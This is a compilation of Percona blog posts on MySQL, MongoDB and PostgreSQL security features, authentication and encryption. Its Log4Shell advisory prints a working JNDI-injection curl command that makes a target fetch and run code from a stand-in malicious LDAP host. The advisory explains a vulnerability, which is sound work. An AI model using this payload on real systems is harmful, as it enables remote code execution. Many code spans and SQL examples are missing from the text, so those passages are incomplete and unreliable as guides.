Securing Dynamic Log File Locations in MySQL

Securing Dynamic Log File Locations in MySQL

Securing Dynamic Log File Locations in MySQLMySQL allows changing the location of the general log and the slow query log while the server is running by anybody having the SYSTEM_VARIABLES_ADMIN privilege to any location, including appending to existing files. In Percona Server for MySQL 8.0.28-19 we introduced a new system variable, secure-log-path, that can be used to restrict the location of these log files to avoid accidents or possible data corruption attacks.

When somebody with the system variables admin privilege changes these variables, the server runs a few sanity checks. Unfortunately, these checks are quite minimal, and only verify that the specified file is writable by mysqld.

Compared to this, other variables specifying write-related file and directory names are either read-only during the runtime of the server (such as datadir, tmpdir, or log_error), or have additional security checks, for example, the FILE privilege restricted by secure-file-priv.

Without a mechanism like that, these log files can be redirected to any file writable by MySQL, such as ibdata0 or any other data file in the data directory. The server only appends to these files, and no data will be deleted from them, but this still makes it possible to corrupt these files by writing unrelated log messages into them.

To fix this issue, starting with Percona Server for MySQL 8.0.28-19 we introduced a new variable, secure-log-path. This works similarly to secure-file-priv: it can be either empty (which is the default) or the name of a directory. If it is specified, the general log file and the slow query log can only be set to a file within that directory.

Similar to secure-file-priv, the server will display a warning during startup if this new variable is empty, and also if the data directory is within it.

While these two variables are similar, it is also important that they are not the same: in most setups, users with the FILE privilege shouldn’t have read access to the log files written by mysqld using SQL commands, as that could leak potentially sensitive data. To avoid this, it is important to set them to different directories.


Upgrade your Libraries: Authentication Plugin ‘caching_sha2_password’ Cannot be Loaded

'caching_sha2_password' Cannot be Loaded

'caching_sha2_password' Cannot be LoadedFor my previous blog post on the topic, I received plenty of questions about why I did not cover the


  plugin. This plugin is the default since MySQL 8, and all user accounts which are created without the option


, will use this plugin. Locally everything works fine because the plugin is built-in to the MySQL server and client.

If you then connect with such a user account from a remote machine you may get an error similar to:

ERROR 2059 (HY000): Authentication plugin 'caching_sha2_password' cannot be loaded: /usr/lib64/mysql/plugin/ cannot open shared object file: No such file or directory

Unlike the situation, mentioned in the other blog post, the reason for this error is not always the


  option of the


  client. More often this means that you did not upgrade MySQL client libraries.



  was first introduced in MySQL 5.7. If you somehow still use MySQL 5.6 or an earlier version, you would not be able to connect to MySQL using this plugin.

Some operating systems have MariaDB packages in place of MySQL.

MariaDB server does not support the


  plugin. But MariaDB Connector/C does support this plugin since version 3.0.2. The plugin is not built-in and is provided as a separate library. All clients that use MariaDB Connector/C support authentication with the


  plugin. This includes




  command-line clients.

MariaDB libmysqlclient library does not support the


  plugin. Therefore, if you use a client linked to this library, you would not be able to authenticate with the



Applications that connect to MySQL using different APIs, such as Python, PHP, Go, Java, and ODBC need to use the latest version of the connectors and database drivers. Both MySQL and MariaDB connectors support the



This also applies to Percona Toolkit.


In order to use the


  authentication plugin:

  • For MySQL, Percona Server for MySQL, and Percona XtraDB Cluster
    • Use client version 5.7 or newer
    • No other actions are needed: support is built-in
  • For MariaDB
    • Use client, linked with MariaDB Connector/C 3.0.2 or newer
    • Specify option

        if your client cannot find the

        library in the default location


Percona Monitoring and Management Security Threat Tool

Percona Monitoring and Management Security Threat Tool

Percona Monitoring and Management (PMM) is a multi-faceted tool that includes the Security Threat Tool which provides the ability to check your databases for potential configuration or performance problems.  And boy was I shocked to find I had problems when I installed PMM for testing.

The complete list of checks that PMM runs daily can be found at and they range from unsecured log file permissions to low cache rates, depending on the database.  PMM checks MySQL, MongoDB, and PostgreSQL instances. These checks are categorized as critical, major, or trivial depending on their respective impact and you can silence them if the issue is chronic but has been decided as something that can be tolerated. 

I installed PMM and Percona Distribution for MySQL on a test server and enabled PMM security.  On the home screen, the alert menu was instantly displayed.  

Security Alert

It is a little shocking to find your new server has potential security issues.

Yup, my test system had problems!  I clicked on the above section of the PMM home page fearful of what horrors awaited me.  

The Security Warnings

The warnings from PMM’s Security Threat Tool are clear and concise, often offering setting recommendations

There were no ‘critical’ problems but there were two ‘major’ and three ‘trivial’ issues. The first of the ‘major’ problems was that the master_verify_checksum is disabled.  The master_verify_checksum variable is used in replication. Since this was a test machine and not part of any replication topology, there really is not a need to have a replication source verify events read from the binary log by examining checksums, stopping in the case of a mismatch. BTW master_verify_checksum is disabled by default.

The last ‘major’ issue is that the binary log files are rotated too quickly and PMM suggested a value for this setting. Once again for an ephemeral test system, I could live with this issue as nobody else was dependent on this system.

The ‘trivial’ issues were somethings that may not be considered trivial by all.  The first of these is the InnoDB flush method.  My test system was set up to use fsync while PMM recommends O_DIRECT which is usually the choice for use with local disks. I will not review all the options and opinions (and there are many) but it was nice to get a gentle prodding from PMM about this issue. If this test system was going to be around for a while, I would definitely change the current setting to the recommended. 

My second ‘trivial’ problem was more of a warning about a user who had DBA privileges. And the last problem was a recommendation to change the binlog_row_image being set to full when minimal would provide better performance.  You might consider these nagging by PMM but both are issues a DBA or a Reliability Engineer would gladly be reminded of.  

To enable the Security threat Tool, select the Gear Icon on the left side of the main PMM display and click on the gear icon for the Configuration option and then the second gear icon for Settings.

Config Settings

Please pick the configuration ‘gear’ icon


Then select advanced settings

Security Threat Tool

And finally, enable the Security Threat Tool and I would stick with the default values on intervals when you begin to explore this tool.


The Percona Monitoring and Management Security Threat Tool is a handy way to gain insight into your MySQL, PostgreSQL, or MongoDB database.  It provides information that general security tools will not provide and is packed with Percona’s easy-to-use PMM interface.  This is an open source tool that you need to have at your disposal.


MySQL 8: Multi-Factor Authentication Overview

MySQL 8 Multi-Factor Authentication Overview

MySQL 8 Multi-Factor Authentication OverviewAs part of my ongoing series around MySQL 8 user administration, I’d like to cover one of the new features introduced in MySQL 8.0.27 – multi-factor authentication. In order to establish identity, multi-factor authentication (MFA) is the use of multiple authentication values (factors) during the MySQL authentication process.


MFA provides greater security compared to a single-factor authentication method, which has historically been based on simple methods such as password authentication. With MFA, additional authentication methods are enabled, such as requiring multiple passwords, or with devices such as smart cards, security keys, or biometric readers.

As of MySQL 8.0.27, it is now possible to require up to three authentication values to establish identity. In addition to the more common 2FA (two-factor authentication), MySQL can now also support 3FA (three-factor authentication) to complement the existing single-factor authentication that we’re all familiar with. You can mix and match different authentication methods in different combinations which makes MySQL’s MFA implementation very configurable to meet your particular security goals.

How It Works

The process of authentication is similar regardless of the number of factors required. When connecting to MySQL in the typical way (1FA using a password), the server invokes the authentication plugin indicated by the account definition and accepts or rejects the connection depending on whether the plugin reports success or failure.

With MFA authentication, the server follows the same basic process but will invoke the authentication plugins in the order listed in the account definition. If a plugin reports success and is the last plugin listed, the server will accept the connection. If a plugin reports success and is not the last plugin in the list, it will invoke the next plugin and move through the list until all of the plugins have been successfully processed. If any one of the plugins reports failure, the server will reject the connection.

MFA Elements

Authentication factors will commonly include:

  • Secret passwords
  • Security key (or smart card)
  • Biometric data (fingerprints, facial scan, etc)

Using a password relies on that information being kept secret on both sides of the authentication process. As we all know, however, this can be subject to compromise. It is possible for your password to fall into other hands in various ways. Someone could see you entering your password, or you could be a victim of a phishing attack. Passwords are compromised during server-side security breaches, so it is possible to lose password security even when you’re not specifically at fault. While security can certainly be improved upon by using multiple passwords, the safest method would be to utilize some of the other factor types in addition to password authentication. This will give you the best security with the least risk of compromise.

  • The number and type of implementation factors are controlled with the authentication_policy system variable. This variable places constraints on CREATE USER and ALTER USER statements with respect to multifactor authentication.
  • CREATE USER and ALTER USER have syntax enabling multiple authentication methods to be specified for new accounts, and for adding, modifying, or dropping authentication methods for an existing account. 
    • If an account uses 2FA or 3FA, the mysql.user table stores information about the additional authentication factors in the User_attributes column. 

Authentication Policy

The authentication_policy system variable defines the multi-factor authentication policy. In a nutshell, this variable defines how many authentication factors accounts may have (or are required to have) and the authentication methods that can be used for each factor. 

The value of the authentication_policy variable is a list with one, two, or three comma-separated elements depending on your desired level of MFA. Each element in this list corresponds to an authentication factor and can be an authentication plugin name, an asterisk (*), empty, or missing. 

NOTE: There is one exception to this – the first element cannot be either empty or missing. 

As an example, see the following authentication_policy value which includes an asterisk, an authentication plugin name, and an empty element:

authentication_policy = '*,authentication_ldap_simple, '

  • The asterisk (*) indicates that an authentication method is required, but any method is permitted. 
  • An empty element indicates that an authentication method is optional, and any method is permitted. 
  • A missing element (no asterisk, no empty element, no authentication plugin name) indicates that an authentication method is *not* permitted. 
  • When a plugin name is specified, that authentication method is required for the respective factor when creating or modifying an account. 

The default authentication_policy value is ‘*,,’ (an asterisk, and two empty elements). This default configuration requires a first factor and optionally permits a second and third factor as well. As such, the default authentication_policy is entirely backward compatible with existing 1FA accounts but gives the added flexibility of being able to use 2FA or 3FA as well. 

To enable authentication to the MySQL server using accounts that require multiple passwords (such as caching_sha2_password + authentication_ldap_simple for instance), client programs have –password1, –password2, and –password3 options that can permit up to three passwords to be specified. 

External Device(s) Authentication

The server-side authentication_fido plugin enables authentication using external devices. If this plugin is the only authentication plugin used by an account, it will also allow passwordless authentication. This plugin is only included in MySQL Enterprise distributions, however, and is not included in MySQL Community distributions. 

The client-side authentication_fido_client plugin is included in all distributions, including the MySQL Community distributions. This enables clients from any distribution to connect to accounts that use authentication_fido to authenticate on a server that has that plugin loaded. 

Note that multi-factor authentication can use non-FIDO MySQL authentication methods, the FIDO authentication method, or a combination of both. 


The following privileges enable users to perform certain restricted multi-factor authentication-related operations.

  • If a user has the AUTHENTICATION_POLICY_ADMIN privilege, they will not be subject to the constraints imposed by the authentication_policy system variable (see above). While the constraints are not enforced in this case, a warning is given for any statements that otherwise would not be permitted. 
  • If a user has the PASSWORDLESS_USER_ADMIN privilege, this will enable the creation of passwordless authentication accounts and replication of operations on those accounts. 

In Closing

Using multi-factor authentication can increase the security of your database systems, and MySQL 8.0.27 is bringing several powerful new options to the table with a robust MFA implementation. In future installments of this series, I’ll continue to expand on this topic as we dive deeper into the user administration and security aspects of MySQL. If you are interested in further exploring MFA in your database environment, let our Professional Services team help you implement the approach that is best suited for your requirements – we are here to help!


MySQL 8: Password Verification Policy

MySQL 8 Password Verification Policy

MySQL 8 Password Verification PolicyIn keeping with my MySQL 8 user administration and security theme, I’d like to discuss the password verification-required policy introduced in MySQL 8.0.13. With this feature, it is possible to require that attempts to change an account password be verified by specifying the existing current password to be replaced.


The password verification-required policy enables DBAs to prevent users from changing a password without proving that they know the current password. When would this happen? Such changes could occur if a user walked away from a terminal session without logging out, and a malicious user uses the open session to change the original user’s MySQL password. As you can imagine, this could have disastrous consequences:

  • The original user is now unable to access MySQL until an administrator can reset the account password. 
  • The malicious user can access MySQL until a password reset can be implemented compromising any data the original user had access to. 

Per-User Settings

Password-verification policy can be established globally, and individual user accounts can be set to either defer to the global policy or override the global policy with specific per-account behavior. This setting is established by the PASSWORD REQUIRE option of CREATE USER and ALTER USER statements. 

  • If the account setting is PASSWORD REQUIRE CURRENT, then password changes must specify the current password. 
  • If the account setting is PASSWORD REQUIRE CURRENT OPTIONAL, then the user can optionally supply the current password but it isn’t required for a password change.
  • If the account setting is PASSWORD REQUIRE CURRENT DEFAULT, then the global password_require_current system variable determines the verification-required policy for the account: 
    • Password changes must specify the current password if password_require_current system variable is enabled. 
    •  Password changes may optionally specify the current password if password_require_current system variable is disabled. 

If the account setting is not PASSWORD REQUIRE CURRENT DEFAULT, the account setting takes precedence over the global policy established by the password_require_current system variable. Otherwise, the account defers to the password_require_current setting. 

Password verification is optional by default – the password_require_current system variable is disabled and accounts that are created with no PASSWORD REQUIRE option defaults to PASSWORD REQUIRE CURRENT DEFAULT

To see how per-account user settings interact with password_require_current system variable values to determine the account password verification-required policy, see below:


Per-Account Setting password_require_current System Variable Password Changes Require Current Password?

For example, to implement a per-user requirement that the current password must be entered to change the password for a specific user, the following CREATE USER statement will accomplish this:


The ALTER USER equivalent would be:


This per-user verification policy overrides the global policy for all accounts specified. 

Global Settings

If you prefer to establish a global password-verification policy, change the password_require_current system variable from its disabled default. As an example, to establish a global policy that password changes must specify the current password, set the following in the configuration file:

password_require_current = ON

You can also set this at runtime with the SET PERSIST statement within a running instance:

mysql> SET PERSIST password_require_current = ON;

This sets a value for the running MySQL instance and saves the value to carry over to subsequent server restarts. To change the value for the running MySQL instance without having it carry over to subsequent restarts, use the GLOBAL keyword instead of PERSIST

Keep in mind that any per-user settings will override the global setting. This allows you to tailor a custom authentication scenario based on your use case. 


Privileged users can change any account password without specifying the current password regardless of the verification-required policy. A privileged user is any user with the global CREATE USER or UPDATE privilege for the ‘mysql’ system database. 

Wrapping Up

MySQL 8 has made great strides in bolstering user administration and user security. While we often take for granted something as simple as requiring the current password before a password change, using this option in concert with other MySQL 8 security features builds a secure and easily administered database environment that hasn’t been possible historically without relying on additional plugins or custom solutions.


Authenticating Your Clients to MongoDB on Kubernetes Using x509 Certificates

MongoDB on Kubernetes Using x509 Certificates

MongoDB on Kubernetes Using x509 CertificatesManaging database users and their passwords can be a hassle. Sometimes, they could even wait in various configuration files, hardcoded. Using certificates can help you avoid the toil of managing, rotating, and securing user passwords, so let’s see how to have x509 certificate authentication with the Percona Server for MongoDB Operator and cert-manager.

cert-manager is our recommended way to manage TLS certificates on Kubernetes clusters. The operator is already integrated with it to generate certificates for TLS and cluster member authentication. We’re going to leverage cert-manager APIs to generate valid certificates for MongoDB clients.

There are rules to follow to have a valid certificate for user authentication:

  1. A single Certificate Authority (CA) MUST sign all certificates.
  2. The certificate’s subject MUST be unique.
  3. The certificate MUST not be expired.

For the complete requirements, check the MongoDB docs.

Creating Valid Certificates for Clients

Let’s check our current certificates:

$ kubectl get cert
NAME                      READY   SECRET                    AGE
cluster1-ssl              True    cluster1-ssl              17h
cluster1-ssl-internal     True    cluster1-ssl-internal     17h

The operator configures MongoDB nodes to use “cluster1-ssl-internal” as the certificate authority. We’re going to use it to sign the client certificates to conform to Rule 1.

First, we need to create an Issuer:

$ kubectl apply -f - <<EOF
kind: Issuer
 name: cluster1-psmdb-x509-ca
   secretName: cluster1-ssl-internal

Then, our certificate:

$ kubectl apply -f - <<EOF
kind: Certificate
 name: cluster1-psmdb-egegunes
 secretName: cluster1-psmdb-egegunes
 isCA: false
 commonName: egegunes
     - percona
     - cloud
   - digital signature
   - client auth
   name: cluster1-psmdb-x509-ca
   kind: Issuer

The “usages” field is important. You shouldn’t touch its values. You can change the “subject” and “commonName” fields as you wish. They’re going to construct the Distinguished Name (DN) and DN will be the username.

$ kubectl get secret cluster1-psmdb-egegunes -o yaml \
    | yq3 r - 'data."tls.crt"' \
    | base64 -d \
    | openssl x509 -subject -noout

subject=O = percona, OU = cloud, CN = egegunes

Let’s create the user:

rs0:PRIMARY> db.getSiblingDB("$external").runCommand(
   createUser: "CN=egegunes,OU=cloud,O=percona",
   roles: [{ role: 'readWrite', db: 'test' }]

       "ok" : 1,
       "$clusterTime" : {
               "clusterTime" : Timestamp(1643099623, 3),
               "signature" : {
                       "hash" : BinData(0,"EdPrmPJqfgRpMEZwGMeKNLdCe10="),
                       "keyId" : NumberLong("7056790236952526853")
       "operationTime" : Timestamp(1643099623, 3)

We’re creating the user in the “$external” database. You need to use “$external” as your authentication source. Note that we’re reversing the subject fields, this is important.

Authenticating With the Certificate

I have created a simple Go application to show how you can use x509 certificates to authenticate. It’s redacted here for brevity:

// ca.crt is mounted from secret/cluster1-ssl
caFilePath := "/etc/mongodb-ssl/ca.crt"

// tls.pem consists of tls.key and tls.crt, they're mounted from secret/cluster1-psmdb-egegunes
certKeyFilePath := "/tmp/tls.pem"

endpoint := "cluster1-rs0.psmdb.svc.cluster.local"

uri := fmt.Sprintf(

credential := options.Credential{
       AuthMechanism: "MONGODB-X509",
       AuthSource:    "$external",

opts := options.Client().SetAuth(credential).ApplyURI(uri)

client, _ := mongo.Connect(ctx, opts)

The important part is using “MONGODB-X509” as the authentication mechanism. We also need to pass the CA and client certificate in the MongoDB URI.

$ kubectl logs psmdb-x509-tester-688c989567-rmgxv
2022/01/25 07:50:09 Connecting to database
2022/01/25 07:50:09 URI: mongodb+srv://cluster1-rs0.psmdb.svc.cluster.local/?tlsCAFile=/etc/mongodb-ssl/ca.crt&tlsCertificateKeyFile=/tmp/tls.pem
2022/01/25 07:50:09 Username: O=percona,OU=cloud,CN=egegunes
2022/01/25 07:50:09 Connected to database
2022/01/25 07:50:09 Successful ping

You can see the complete example in this repository. If you have any questions, please add a comment or create a topic in the Percona Forums.


PostgreSQL 14 and Recent SCRAM Authentication Changes – Should I Migrate to SCRAM?

PostgreSQL Migrate to SCRAM

Recently, a few PostgreSQL users reported that they got connection failures after switching to PostgreSQL 14.

Why do I get the error FATAL:  password authentication failed for a user in the new server?” has become one of the most intriguing questions.

At least in one case, it was a bit of a surprise that the application message was as follows:

FATAL: Connection to database failed: connection to server at “localhost” (::1), port 5432 failed: fe_sendauth: no password supplied

The reason for these errors is the defaults for password encryption are changed in new versions of PostgreSQL to SCRAM authentication. Even though the last one appears nothing directly related to SCRAM, oh yes, some post-installation script failed which was looking for “md5”.

SCRAM authentication is not something new in PostgreSQL. It was there from PostgreSQL 10 onwards but never affected DBA life in general because that has never been the default. It was an opt-in feature by explicitly changing the default settings. Those who do an opt-in generally understand and do it intentionally, and it’s never been known to cause any problem. The PostgreSQL community was reluctant to make it a prime method for years because many of the client/application libraries were not ready for SCRAM authentication.

But that is changing in PostgreSQL 14. With PostgreSQL 9.6 going out of support, the landscape is changing. Now we expect all old client libraries to get upgraded and SCRAM authentication is becoming the prime password authentication method. But, those who are completely unaware are going to be greeted with a surprise one day or another. The purpose of this post is to create a quick awareness for those who are not yet, and address some of the commonly asked questions.

What is SCRAM Authentication?

In simple words, the database client and the server prove and convince each other that they know the password without exchanging the password or the password hash. Yes, it is possible by doing a Salted Challenge and Responses, SCRAM-SHA-256, as specified by RFC 7677. This way of storing, communicating, and verifying passwords makes it very hard to break a password.

This method is more resistant to:

  • Dictionary attacks
  • Replay attacks
  • Stollen hashes

Overall it becomes very hard to break a password-based authentication.

What Has Changed Over Time?

Channel Binding

Authentication is only one part of secured communication. After authentication, a rogue server in the middle can potentially take over and fool the client connection. PostgreSQL 11 introduced SCRAM-SHA-256-PLUS which supports the channel binding. This is to make sure that there is no rogue server acting as a real server OR doing a man-in-middle attack.

From PostgreSQL 13 onwards, a client can request and even insist on channel binding.

For example:

psql -U postgres -h c76pri channel_binding=prefer
psql -U postgres -h c76pri channel_binding=require

The channel binding works over SSL/TLS, so SSL/TLS configuration is mandatory to get the channel binding work.

Setting Password Encryption

The md5 was the only available option for password encryption before PostgreSQL 10, so PostgreSQL allows settings to indicate that “password encryption is required” which is defaulted to md5.

–Upto PG 13
postgres=# set password_encryption TO ON;

Due to the same reason, the above statement was effectively the same as:

postgres=# set password_encryption TO MD5;

We could even use “true”, “1”,”yes” instead of “on” as an equivalent value.

But now we have multiple encryption methods and “ON” doesn’t really convey what we really want. So from PostgreSQL 14 onwards, the system expects us to specify the encryption method.

postgres=# set password_encryption TO 'scram-sha-256';

postgres=# set password_encryption TO 'md5';

Any attempt to use “on”/”true”, ”yes” will be rejected with an error.

–-From PG 14
postgres=# set password_encryption TO 'on';
ERROR:  invalid value for parameter "password_encryption": "on"
HINT:  Available values: md5, scram-sha-256.

So please check your scripts and make sure that they don’t have the old way of “enabling” encryption.

Some Frequently Asked Questions

  1. Does my logical backup and restore get affected?
    Logical backup and restore of PostgreSQL globals (pg_dumpall) won’t affect the SCRAM authentication, the same password should work after the restore. In fact, it will be interesting to recollect that the SCRAM authentication is more resilient to changes. For example, if we rename a USER the old MD5 password won’t work anymore, because the way PostgreSQL generates the MD5 it uses the username also.

    postgres=# ALTER USER jobin1 RENAME TO jobin;
    NOTICE:  MD5 password cleared because of role rename

    As the NOTICE indicates the password hash in the pg_authid will be cleared as the old one is no longer valid. But this won’t be the case with SCRAM authentication, as we can rename the users without affecting the password.

    postgres=# ALTER USER jobin RENAME TO jobin1;
  2. The existing/old method of encryption (md5) was a big vulnerability. Was there a big risk?
    This worry mainly comes from the name “MD5” which is way too silly for modern hardware. The way PostgreSQL uses md5 is different is not just the hash of the password, but it considers the username also.  Additionally, it is communicated over the wire after preparing a hash with a random salt provided by the server. Effectively what is communicated will be different from the password hash, so it is not too vulnerable. But prone to dictionary attacks and leaked username password hash problems.
  3. Is the new scram authentication ads complex to authenticate? Is my connection request is going to take more time?
    The wire protocol SCRAM is very efficient and not known to cause any degradation in connection time. Moreover, compared to other overheads of server-side connection management, the overhead created by SCRAM becomes very negligible
  4. Is it mandatory to use SCRAM authentication from PostgreSQL 14 and force all my user accounts to switch to it?
    Definitely not, only the defaults are changed. Old method md5 is still a valid method that works great, and if the access to the PostgreSQL environment is restricted by firewall/hba rules, there is already less risk in using md5.
  5. Why do I get the “: FATAL:  password authentication failed for user “ error when I switched to PostgreSQL 14?
    The most probable reason is the pg_hba.conf entries. If we specify “md5” as the authentication method, PostgreSQL will allow SCRAM authentication also. But the reverse won’t work. When you created the PostgreSQL 14 environment, most probably it may have “scram-sha-256” as the authentication method. In some of the PostgreSQL packages, the installation script automatically does it for you ? In case the authentication works from the PostgreSQL client tools and not from the application, please check the driver version check the scope for upgrade
  6. Why do I get other types of authentication errors?
    The most probable reasons are the post-installation scripts. It is a regular practice in many organizations to use DevOps tools (Ansible/Chef) or even shell scripts to do the post-installation customizations. Many of those will be doing a range of things that involves steps like set password_encryption TO ON; or even modification to pg_hba.conf using sed, which is expected to fail if it is trying to modify an entry that is not there anymore.

Why Should I Care and What To Do

Anything starting from automation/deployment scripts, tools, application connections, and connection poolers could potentially break. One of the major arguments for delaying this change till PostgreSQL 14 is that the oldest supported version (9.6) is going out of support soon. So this is the right time to inspect your environments to see if any of those environments have old PostgreSQL libraries (9.6 or older) and have a plan for the upgrade, as the old version PostgreSQL libraries cannot handle SCRAM negotiations.

In summary, having a good plan to migrate will help, even though it is not urgent.

    1. Inspect the environments and application drivers to see whether any of them are still using old versions of PostgreSQL client libraries and upgrade them wherever required.
      Please refer to:
      Encourage / Drive the upgrade of client libraries with a timeline
    2. If the existing environment is using md5, encourage users to switch to SCRAM authentication.
      Remember that the authentication method mentioned as “md5” in pg_hba.conf will continue to work for both SCRAM and MD5 authentication in PostgreSQL 14 also.
    3. Take every opportunity to test and migrate automation, connection poolers, and other infrastructure to SCRAM authentication.

By changing the default authentication, the PostgreSQL community is showing a clear direction about the future.

Percona Distribution for PostgreSQL provides the best and most critical enterprise components from the open-source community, in a single distribution, designed and tested to work together.

Download Percona Distribution for PostgreSQL Today!


Percona Server for MySQL Encryption Options and Choices

Percona Server for MySQL Encryption

Percona Server for MySQL EncryptionSecurity will always be a main focal point of a company’s data. A common question I get from clients is, “how do I enable encryption?” Like every good consulting answer, it depends on what you are trying to encrypt. This post is a high-level summary of the different options available for encryption in Percona Server for MySQL.

Different certifications require different levels of encryption. For example, PCI requires both encryptions of data at rest and in transit. Here are the main facets of encryption for MySQL:

  • Data at Rest
    • Full disk encryption (at the OS level)
    • Transparent Data Encryption – TDE
    • Column/field-level encryption
  • Data in Transit
    • TLS Connections

Data at Rest

Data at rest is frequently the most asked about part of encryption. Data at rest encryption has multiple components, but at the core is simply ensuring that the data is encrypted at some level when stored. Here are the primary ways we can look at the encryption of data at rest.

Full Disk Encryption (FDE)

This is the easiest and most portable method of encrypting data at rest. When using full disk encryption, the main goal is to protect the hard drives in the event they are compromised. If a disk is removed from the server or the server is removed from a rack, the disk isn’t readable without the encryption key.

This can be managed in different ways, but the infrastructure team generally handles it. Frequently, enterprises already have disk encryption as part of the infrastructure stack. This makes FDE a relatively easy option for data at rest encryption. It also has the advantage of being portable. Regardless of which database technology you use, the encryption is managed at the server level.

The main disadvantage of FDE is that when the server is running, and the disk is mounted, all data is readable. It offers no protection against an attack on a running server once mounted.

Transparent Data Encryption (TDE)

Moving up the chain, the next option for data at rest encryption is Transparent Data Encryption (TDE). In contrast to FDE, this method encrypts the actual InnoDB data and log files. The main difference with database TDE is that the encryption is managed through the database, not at the server level. With this approach, the data and log files are encrypted on disk by the database. As data is read by MySQL/queries, the encrypted pages are read from disk and decrypted to be loaded into InnoDB’s buffer pool for execution.

For this method, the encryption keys are managed either through local files or a remote KMS (such as Hashicorp Vault) with the keyring_plugin. While this approach helps prevent any OS user from simply copying data files, the decrypted data does reside in memory which could be susceptible to a clever hacker. We must rely on OS-level memory protections for further assurance. It also adds a level of complexity for key management and backups that is now shifted to the DBA team.

Column Level Encryption

While the prior methods of at-rest encryption can help to meet various compliance requirements, both are limited when it comes to a running system. In either case, if a running system is compromised, the data stored is fully readable. Column level encryption works to protect the data in a running system without a key. Without a key, the data in the encrypted column is unreadable.

While this method protects selected data in a running system, it often requires application-level changes. Inserts are done with a specific encryption function (AES_ENCRYPT in MySQL, for example). To read the data, AES_DECRYPT with the specified key is required. The main risk with this approach is sending the plaintext values as part of the query. This can be sniffed if not using TLS or potentially leaked through log files. The better approach is to encrypt the data in the application BEFORE sending it to MySQL to ensure no plaintext is ever passed between systems.

In some cases, you can use a shared key for the entire application. Other approaches would be to use an envelope method and store a unique key alongside each encrypted value (protected by a separate master key).

Either way, it is important to understand one of the primary downsides to this approach – indexes and sort order can and will be impacted. For example, if you are encrypting the SSN number, you won’t be able to sort by SSN within MySQL. You would be able to look up a row using the SSN number but would need to pass the encrypted value.

Data in Transit

Now that we’ve discussed the different types of data-at-rest encryption, it is important to encrypt traffic to and from the database. Connecting to the server via TLS ensures that any sensitive sent to or from the server is encrypted. This can prevent data from leaking over the wire or via man-in-the-middle attacks.

This is a straightforward way to secure communication, and when combined with some at-rest encryption, serves to check a few more boxes towards various compliances.


Overall, there are several aspects of encryption in MySQL. This makes it possible to meet many common compliance requirements for different types of regulations. Security is a critical piece of the database tier, and these discussions are needed across teams in an organization. Ensuring that security, infrastructure, and the database team are on the same page is essential, especially during the design phase. Let our Professional Services team help you implement the approach that is best suited for your requirements – we are here to help!

Percona Distribution for MySQL is the most complete, stable, scalable, and secure, open-source MySQL solution available, delivering enterprise-grade database environments for your most critical business applications… and it’s free to use!

Download Percona Distribution for MySQL Today


Log4JShell Vulnerability Update

Log4JShell Vulnerability Update

Log4JShell Vulnerability UpdatePercona Security has been tracking an evolving issue over the weekend and into the beginning of this week.

The Log4J vulnerability, also sometimes referred to as Log4JShell, can be exploited to allow for the complete takeover of the target to run any arbitrary code.

This affects versions of log4j 2.0-beta9 through 2.14.1 – the current advisory is to update to the fixed release version 2.15.0 or greater.

The Exploit

The most simplistic example being:  

curl https://target.domain.tld -H 'X-Api-Version: ${jndi:ldap://malicious_server/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' -o/dev/null -v

when executed this runs touch /tmp/pwned on the target system.

There are many such examples being tracked at the time of writing which seeks to either exploit the issue or at the very least confirm the presence of the issue.

Is any Percona Software or Service Affected by this Vulnerability?

At the time of writing, no Percona software is known to be affected by the CVE-2021-44228 log4j vulnerability as we do not employ Java in any of the Open Source Software produced here at Percona at this time.

We are of course working with our service vendors and third parties to ensure they too are not affected by this issue and are tracking their response internally via JIRA ticket at the time of writing. Percona is not aware of any of our service providers impacted by the log4j vulnerability at the time of writing.

Where possible, we are employing methods to increase visibility, and protection against this issue regardless of the underlying software not being affected to apply additional layers of protection.

We have validated that the software we are using in our build pipelines is not affected by this issue at the time of writing.

Please refer to the details on regarding the appropriate channels of contact, should you wish to raise a direct contact request regarding this or another issue.

UPDATE 2021-12-15:

The fix implemented in 2.15 of log4j has been reported as an “incomplete” fix; the new CVE to track this issue is CVE-2021-45046, as such log4j currently requires updating to >= 2.16 to fully protect against these issues, whilst this latest issue is reported as moderate (not high) severity (likely due to the complexity of the exploitation vector), our advice at this time is to ensure update to address this also at this time.

Percona continues to track this major issue and take appropriate action to safeguard our clients and users.

We are working on enhancing defences and active scanning and reporting for indicators of the log4j issues, at this stage, regardless of not having been affected directly by this issue at this point in time, we wish to safeguard against this in the future by taking appropriate measures to safeguard against this.

Our teams are working diligently on this issue, and we expect to publish further updates as this issue continues to unfold and further detail becomes available through our testing and through the publication of information.

David Busby
Information Security Architect


MySQL 8: Random Password Generator

MySQL 8 Random Password Generator

MySQL 8 Random Password GeneratorAs part of my ongoing focus on MySQL 8 user and password management, I’ve covered how using the new dual passwords feature can reduce the overall DBA workload and streamline the management process. I’ve also covered how the new password failure tracking features can enable the locking of an account with too many failed password attempts (see MySQL 8: Account Locking).

There are other new and useful features that have been added to the user management capabilities in MySQL 8 however, and an often overlooked change was the implementation of a random password generator. First introduced in MySQL 8.0.18, with this feature, CREATE USER, ALTER USER, and SET PASSWORD statements have the capability of generating random passwords for user accounts as an alternative to explicit administrator specified passwords.

Usage of MySQL 8 Random Password Generator

By default, all MySQL-generated random user/account passwords have a length of 20 characters. This can be changed, however, using the ‘generated_random_password_length’ system variable. With a valid range of 5 to 255, this dynamic variable can be assigned on a global or session-level and determines the overall password length of the randomly generated password.

mysql> SHOW variables LIKE 'generated_random_password_length';
| Variable_name                    | Value |
| generated_random_password_length | 20    |
1 row in set (0.01 sec)

Once a random password has been generated for a given user account, the statement stores the password in the ‘mysql.user’ system table, hashed appropriately for the authentication plugin. The cleartext ‘generated password’ is returned in the result set along with the ‘user’ and ‘host’  so that information is available to the user or application. See below examples:

| user    | host      | generated password   |
| percona | localhost | k%RJ51/kA>,B(74;DBq2 |
1 row in set (0.02 sec)

mysql> ALTER USER 'percona'@'localhost' IDENTIFIED BY RANDOM PASSWORD;
| user    | host      | generated password   |
| percona | localhost | eX!EOssQ,(Hn4dOdw6Om |
1 row in set (0.01 sec)

mysql> SET PASSWORD FOR 'percona'@'localhost' TO RANDOM;
| user    | host      | generated password   |
| percona | localhost | 5ohXP2LBTTPzJ+7oEDL4 |
1 row in set (0.00 sec)


The clear text generated password is logged only in hashed form, so it is never available in plain text anywhere other than the initial result set from the user statement (as above). The authentication plugin is also named in the binlog alongside the hashed password value.  Below are a couple of examples that have been extracted from the MySQL binlog from the ‘percona’@’localhost’ user that we created and altered earlier:

